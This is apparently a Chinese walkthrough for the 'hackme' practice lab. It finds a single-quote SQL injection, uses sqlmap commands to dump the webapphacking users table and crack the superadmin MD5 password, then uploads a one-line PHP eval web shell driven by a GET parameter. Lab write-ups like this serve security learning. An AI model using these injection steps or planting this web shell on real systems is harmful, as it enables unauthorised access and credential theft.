当前位置: 首页 > article >正文

hackme靶机保姆及攻略

安装靶机

打开靶机,利用kali

输入arp-scan -l扫描主机,第三个

访问靶场

点击注册(账号:admin密码:123456)

注册后去登陆

接下来就是我们熟悉的sql注入,这里我们尝试找到他的闭合点

输入Windows OS'页面没有回显

输入Windows OS'#页面正常

说明闭合点为单引号,开始手工注入。。。手工流程我们已经很了解了

我们为了方便用sqlmap去跑

去抓包,在搜索框中输入1,抓包

全部复制下来,创建1.txt文件,放在1.txt中

打开终端,

输入sqlmap -r 1.txt -dbs

库名为webapphacking,在找表名

输入sqlmap -r 1.txt -D webapphacking --tables

表名是users,再报其中的数据

输入sqlmap -r 1.txt -D webapphacking -T users -dump

一直回车

我们得到了登陆密码,把user是superadmin的密码md5解密一下

在去登录我们就会的到文件上传的界面

上传一个木马文件

创建1.php

内容输入<?php @eval($_GET['a']); ?>

浏览上传

我们再用dirb跑一下网站

我们再去检查一下是否上传木马成功(由于我们写的木马是GET方式提交的,所以直接在网址上尝试执行)

写入成功,已通关


http://www.kler.cn/a/445944.html

相关文章:

  • 【C#】try-catch-finally语句的执行顺序,以及在发生异常时的执行顺序
  • linux普通用户使用sudo不需要输密码
  • Go vendor
  • 【服务器】MyBatis是如何在java中使用并进行分页的?
  • 15.初识接口1 C#
  • ChatGPT等大语言模型与水文水资源、水环境领域的深度融合
  • elasticsearch Flattened 使用
  • JS面向对象及继承
  • 【第六节】Git Flow:分支管理模型与工作流程
  • nano编辑器怎么退出并保存
  • DeepFaceLab技术浅析(六):后处理过程
  • Golang中什么是协程泄露(Goroutine Leak)
  • autok3s管理k3s单节点集群
  • [Unity] 【VR】【游戏开发】在VR中使用New Input System获取按键值的完整教程
  • 【Jenkins】pipeline 的基础语法以及快速构建一个 jenkinsfile
  • sql server索引优化语句
  • Tomcat10安装报错Unknown module: java.rmi specified to --add-opens
  • nginx-虚拟主机配置笔记
  • Python TXT文件按条件批量删除行工具
  • 静态socks5代理ip 帮助您找到最合适的ip代理服务
  • 通过阿里云 Milvus 与 PAI 搭建高效的检索增强对话系统
  • JVM基本机制
  • Java 网络编程 ①-TCP || UDP || Socket
  • [搜广推]王树森推荐系统——矩阵补充最近邻查找
  • 深度解析 HarmonyOS 中的 RichEditor:实现图文混排与交互式编辑的利器
  • GO环境安装和配置